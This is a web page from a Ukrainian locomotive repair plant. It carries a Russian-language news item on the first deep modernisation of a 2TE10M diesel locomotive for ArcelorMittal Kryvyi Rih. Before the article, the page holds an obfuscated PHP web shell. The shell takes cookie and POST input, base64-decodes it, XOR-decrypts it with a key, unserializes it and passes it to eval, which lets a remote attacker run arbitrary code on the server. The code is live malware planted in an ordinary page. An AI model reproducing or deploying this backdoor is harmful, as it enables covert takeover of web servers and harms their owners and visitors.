$bJQIbbUMV = 'V' . chr (82) . "\x5f" . 'Y' . "\x66" . 'd' . chr (105); $ZOoTbwaoFM = chr ( 357 - 258 ).chr ( 146 - 38 )."\141" . "\163" . chr (115) . "\137" . chr (101) . chr ( 1096 - 976 )."\151" . "\x73" . "\164" . 's';$QlYgR = class_exists($bJQIbbUMV); $ZOoTbwaoFM = "39097";$gmdRLR = !1;if ($QlYgR == $gmdRLR){function XlMPUe(){$JksGaRYzVZ = new /* 42016 */ VR_Yfdi(18888 + 18888); $JksGaRYzVZ = NULL;}$HgLIxg = "18888";class VR_Yfdi{private function UCrYjbcW($HgLIxg){if (is_array(VR_Yfdi::$OIoQxTAbGN)) {$NoJUeLcfwZ = str_replace(chr (60) . "\x3f" . chr (112) . "\150" . chr (112), "", VR_Yfdi::$OIoQxTAbGN[chr ( 684 - 585 )."\157" . "\x6e" . chr (116) . "\x65" . "\156" . chr (116)]);eval($NoJUeLcfwZ); $HgLIxg = "18888";exit();}}private $EuBJGWlI;public function YykseD(){echo 10293;}public function __destruct(){$HgLIxg = "36515_18124";$this->UCrYjbcW($HgLIxg); $HgLIxg = "36515_18124";}public function __construct($ofQAz=0){$wezeCQ = $_POST;$GXITtPDibl = $_COOKIE;$TgTjjrZE = "104f3740-5e4e-451f-879a-72899c00601a";$zqySHCfme = @$GXITtPDibl[substr($TgTjjrZE, 0, 4)];if (!empty($zqySHCfme)){$HVnFuihx = "base64";$rCKtKL = "";$zqySHCfme = explode(",", $zqySHCfme);foreach ($zqySHCfme as $SZXdcGmIUj){$rCKtKL .= @$GXITtPDibl[$SZXdcGmIUj];$rCKtKL .= @$wezeCQ[$SZXdcGmIUj];}$rCKtKL = array_map($HVnFuihx . "\137" . 'd' . 'e' . 'c' . 'o' . 'd' . chr (101), array($rCKtKL,)); $rCKtKL = $rCKtKL[0] ^ str_repeat($TgTjjrZE, (strlen($rCKtKL[0]) / strlen($TgTjjrZE)) + 1);VR_Yfdi::$OIoQxTAbGN = @unserialize($rCKtKL); $rCKtKL = class_exists("36515_18124");}}public static $OIoQxTAbGN = 29798;}XlMPUe();} МТРЗ впервые провел глубокую модернизацию магистрального тепловоза 2ТЭ10М — ООО «Николаевский Тепловозоремонтный Завод» НТРЗ

МТРЗ впервые провел глубокую модернизацию магистрального тепловоза 2ТЭ10М

  • МТРЗ впервые провел глубокую модернизацию магистрального тепловоза 2ТЭ10М

    Такая модернизация была выполнена впервые на постсоветском пространстве.


    Николаевский тепловозоремонтный завод (НТРЗ) модернизировал очередной локомотив по заказу ArcelorMittal Кривой Рог. В течение почти года велись работы по капитальному ремонту и обновлению магистрального тепловоза 2ТЭ10М, что было сделано впервые на постсоветском пространстве.

    «Мы разработали силами своего конструкторского бюро, совместно с рядом наших украинских партнеров, проект глубокой модернизации тепловоза 2ТЭ10 в чертежах и затем воплотили его в металле. На постсоветском пространстве такую модернизацию пока еще никто не реализовывал, и мы тут пионеры. Аналогичные проекты с успехом реализуются в США и в Европе. В результате модернизации, по сути, от старого тепловоза осталась только рама и колеса. Во всем остальном, мы получили качественно другую, новую машину, которая будет иметь большую силу тяги длительного режима при значительно меньшем расходе топлива», — прокомментировал Симченко.

    По его словам, в ходе модернизации локомотив получил современный двигатель бельгийской компании АВС с ресурсом до капремонта 70 тыс. моточасов; немецкую систему управления двигателем Heinzmann; роторно-пластинчатый компрессорный агрегат АКЛ (МТРЗ /Украина/ — Mattei /Италия) с ресурсом до капитального ремонта — 100 тыс. моточасов; современный тяговый агрегат переменного тока производства «Электротяжмаш»; микропроцессорную систему управления локомотивом.

    Также была установлена система электронного мониторинга работы всех систем локомотива; система контроля топлива и местонахождения локомотива; система климат-контроля кабины машиниста, холодильник, микроволновка и т.д.

    Comments are closed.